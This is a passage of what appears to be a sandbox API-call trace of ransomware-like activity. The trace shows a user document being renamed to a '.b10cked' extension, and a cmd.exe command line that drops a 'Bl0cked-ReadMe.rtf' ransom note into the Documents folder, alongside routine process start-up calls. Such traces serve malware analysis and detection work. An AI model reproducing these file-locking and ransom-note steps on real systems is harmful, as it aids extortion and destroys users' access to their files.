lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", lpFilePart=0x26f328*="0Q56T.odt") returned 0x2c [0140.923] SetErrorMode (uMode=0x0) returned 0x1 [0140.924] SetErrorMode (uMode=0x0) returned 0x0 [0140.924] SetErrorMode (uMode=0x1) returned 0x0 [0140.924] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", nBufferLength=0x104, lpBuffer=0x26f798, lpFilePart=0x26f328 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", lpFilePart=0x26f328*="0Q56T.odt.b10cked") returned 0x34 [0140.924] SetErrorMode (uMode=0x0) returned 0x1 [0140.924] SetLastError (dwErrCode=0x0) [0140.924] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt.b10cked")) returned 0xffffffff [0140.924] GetLastError () returned 0x2 [0140.924] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", fInfoLevelId=0x1, lpFindFileData=0x26eca4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eca4) returned 0x3c0e70 [0140.924] FindNextFileW (in: hFindFile=0x3c0e70, lpFindFileData=0x26eca4 | out: lpFindFileData=0x26eca4) returned 0 [0140.925] GetLastError () returned 0x12 [0140.925] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0140.925] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", fInfoLevelId=0x1, lpFindFileData=0x3d1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1be0) returned 0x3c0e70 [0140.926] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", nBufferLength=0x104, lpBuffer=0x26ef3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked", lpFilePart=0x0) returned 0x34 [0140.926] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", nBufferLength=0x104, lpBuffer=0x26ef3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt", lpFilePart=0x0) returned 0x2c [0140.926] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt")) returned 0x20 [0140.926] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\0Q56T.odt.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fcfnne~1\\0q56t.odt.b10cked"), dwFlags=0x3) returned 1 [0140.926] FindClose (in: hFindFile=0x3c0e70 | out: hFindFile=0x3c0e70) returned 1 [0140.927] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eef0 | out: _Buffer=" 1") returned 9 [0140.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.927] GetFileType (hFile=0x7) returned 0x2 [0140.927] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.927] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ee7c | out: lpMode=0x26ee7c) returned 1 [0140.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eeb0 | out: lpConsoleScreenBufferInfo=0x26eeb0) returned 1 [0140.927] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.928] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eef0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eed4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eed4*=0x1a) returned 1 [0140.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.928] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.929] SetConsoleInputExeNameW () returned 0x1 [0140.929] GetConsoleOutputCP () returned 0x1b5 [0140.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.929] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.929] exit (_Code=0) Process: id = "168" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xe08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14842 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14843 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14844 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14845 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14846 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14847 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14848 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14849 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14850 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 14851 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15666 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15667 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15668 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15669 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 15670 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 15671 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15672 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15673 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15674 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15675 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15676 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15677 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15678 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15679 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15680 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15681 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15682 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15683 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 15684 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 15685 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 15686 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 15687 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 15688 start_va = 0x580000 end_va = 0x6e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 15689 start_va = 0x730000 end_va = 0x132ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Thread: id = 225 os_tid = 0xf5c [0140.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efdc4 | out: lpSystemTimeAsFileTime=0x2efdc4*(dwLowDateTime=0x8d9e8d40, dwHighDateTime=0x1d440a9)) [0140.406] GetCurrentProcessId () returned 0xe08 [0140.406] GetCurrentThreadId () returned 0xf5c [0140.406] GetTickCount () returned 0x2c15b [0140.406] QueryPerformanceCounter (in: lpPerformanceCount=0x2efdbc | out: lpPerformanceCount=0x2efdbc*=19719532125) returned 1 [0140.407] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.407] __set_app_type (_Type=0x1) [0140.407] __p__fmode () returned 0x76b331f4 [0140.407] __p__commode () returned 0x76b331fc [0140.407] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.407] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.407] GetCurrentThreadId () returned 0xf5c [0140.407] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf5c) returned 0x38 [0140.407] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.408] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.408] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.408] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.408] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efd54 | out: phkResult=0x2efd54*=0x0) returned 0x2 [0140.408] VirtualQuery (in: lpAddress=0x2efd8b, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efd24, dwLength=0x1c | out: lpBuffer=0x2efd24*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.408] GetConsoleOutputCP () returned 0x1b5 [0140.408] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.408] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.408] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.409] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.409] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.410] GetEnvironmentStringsW () returned 0x490188* [0140.410] FreeEnvironmentStringsW (penv=0x490188) returned 1 [0140.410] GetEnvironmentStringsW () returned 0x490188* [0140.410] FreeEnvironmentStringsW (penv=0x490188) returned 1 [0140.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecc4 | out: phkResult=0x2eecc4*=0x40) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0xb0, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x0, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegCloseKey (hKey=0x40) returned 0x0 [0140.411] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eecc4 | out: phkResult=0x2eecc4*=0x40) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x40, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x1, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x0, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x9, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x4, lpData=0x2eecd0*=0x9, lpcbData=0x2eecc8*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeccc, lpData=0x2eecd0, lpcbData=0x2eecc8*=0x1000 | out: lpType=0x2eeccc*=0x0, lpData=0x2eecd0*=0x9, lpcbData=0x2eecc8*=0x1000) returned 0x2 [0140.411] RegCloseKey (hKey=0x40) returned 0x0 [0140.411] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.411] srand (_Seed=0x5b88636f) [0140.411] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0140.411] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Bl0cked-ReadMe.rtf\"" [0140.411] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.412] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4918e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.412] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.412] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.412] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.412] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.412] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.412] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.412] GetEnvironmentStringsW () returned 0x4922d8* [0140.412] FreeEnvironmentStringsW (penv=0x4922d8) returned 1 [0140.412] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.412] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.412] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.412] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.412] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.413] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.413] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.413] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.413] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.413] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.413] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efa90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.413] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2efa90, lpFilePart=0x2efa8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2efa8c*="Desktop") returned 0x18 [0140.413] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.413] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef80c | out: lpFindFileData=0x2ef80c) returned 0x490018 [0140.413] FindClose (in: hFindFile=0x490018 | out: hFindFile=0x490018) returned 1 [0140.413] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef80c | out: lpFindFileData=0x2ef80c) returned 0x490018 [0140.413] FindClose (in: hFindFile=0x490018 | out: hFindFile=0x490018) returned 1 [0140.413] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef80c | out: lpFindFileData=0x2ef80c) returned 0x490018 [0140.414] FindClose (in: hFindFile=0x490018 | out: hFindFile=0x490018) returned 1 [0140.414] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.414] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.414] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.414] GetEnvironmentStringsW () returned 0x492af8* [0140.414] FreeEnvironmentStringsW (penv=0x492af8) returned 1 [0140.414] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.415] GetConsoleOutputCP () returned 0x1b5 [0140.415] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.415] GetUserDefaultLCID () returned 0x409 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efbd0, cchData=128 | out: lpLCData="0") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efbd0, cchData=128 | out: lpLCData="0") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efbd0, cchData=128 | out: lpLCData="1") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.415] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.416] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.416] GetLocaleInfoW (in: 